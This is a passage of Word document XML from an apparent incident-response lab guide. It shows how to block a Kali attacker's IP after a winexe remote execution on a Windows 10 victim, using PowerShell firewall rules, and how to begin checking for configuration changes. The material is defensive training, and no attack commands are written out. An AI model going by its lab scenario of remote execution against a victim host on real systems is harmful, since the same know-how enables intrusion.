          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> command originated. As this is a step covered in Lab S04B I will leave those steps to you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>maxsearches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">=13 was set because the default is 10 and, in my index, there were more returned, causing an error. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3D04531E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="06A03076" w14:textId="25F6EE60">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890125" w:id="9"/>
      <w:r>
        <w:t>3.5 Response</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="7A24B98F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="00FE6445" w:rsidRDefault="007D66BC" w14:paraId="6686BC2F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">With our alert set up for detection (if you chose to do so) lets respond to this incident by isolating the perpetrator IP, returning the system to its previous state, find out what caused this state change, and implement measures to defend against reoccurrence. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3FBFC1D0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="36391D72" w14:textId="5E7D250A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890126" w:id="10"/>
      <w:r>
        <w:t>3.5.1 Block Identified Malicious Actor IP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="4015B604" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="6924CFF9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve">As a temporary measure lets block the IP on the victim machine while we are monitoring for any further </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve"> remote executions. This is a temporary measure because while the hole remains in the system, a malicious host can pivot or NAT as a host with a legitimate IP. In our environment that could look like gaining access to a different host or having another attacker machine positioned to continue to the next attack phase with security software now enumerated for coded malware polymorphism. This polymorphism is a feature of modern malware as it adapts itself dynamically based on its </w:t>
      </w:r>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve">execution environment, especially defensive controls. Concerning IP blocking an XDR/EDR or a network positioned firewall like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t>pfsense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve"> or other hardware based, a rule could be implemented to block access for the entire network. Limitations of host-based firewalls can’t impact the entire network like this. But we will defend our victim first in this case. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="444B7D11" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="1F09C773" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="55354B30" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:t>In an Administrator PowerShell on your victim Windows 10 Machine enter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="7892440E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="1E49C234" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Block Inbound from 192.168.0.132" `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="0EABF4C6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Direction Inbound `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="75DA0606" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Action Block `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="482619ED" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RemoteAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.132 `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="78BD7BC6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Protocol Any `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="1842639A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Enabled True `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="45F3CA69" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Profile Any</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="34A8F237" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="5060FA2D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Block Outbound to 192.168.0.132" `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="336A7427" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Direction Outbound `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="15F6D3E9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Action Block `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="392C6005" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RemoteAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.132 `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="766C7981" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Protocol Any `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="3A7E33F6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Enabled True `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="169C4600" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">    -Profile Any</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="04363B7B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="2F948A1E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:t>To remove these later if you like use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="70836FB8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="7D61E957" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Remove-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Block Outbound to 192.168.0.132"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="3041A66B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Remove-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Block Inbound from 192.168.0.132"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="701B2C84" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="5D87B0D3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:t>And be sure the firewall is enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="399765A5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="0023405D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetFirewallProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -Profile </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Domain,Private</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,Public</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -Enabled True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="6368E5F5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="4A4ACE5B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve">You can confirm that the block is enabled by testing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve"> from your Kali Machine to your victim Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="32DB65EE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="25E23261" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57133632" wp14:editId="4653FB50">
            <wp:extent cx="4997450" cy="800873"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1468878520" name="Picture 3" descr="A black background with green numb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78520" name="Picture 3" descr="A black background with green numbers and number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143834" cy="824332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="71B381AF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="0E831D99" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve">No response indicates the transmission is being blocked even though </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D66BC">
        <w:t xml:space="preserve"> is still enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D66BC" w:rsidR="007D66BC" w:rsidP="007D66BC" w:rsidRDefault="007D66BC" w14:paraId="123FDE5C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1FE0E6BB" w14:textId="732EF0B7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890127" w:id="11"/>
      <w:r>
        <w:t>3.5.2 Identify Configuration Change</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="31867E3A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3329337E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>There are several ways to check recent installations, registry changes, and modified system files from the windows command line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4EA9308E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4BB891E0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Run the following for a simple initial check on your system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="02C1137F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4415AFCD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>WindowsOptionalFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -Online |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0F061BF4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
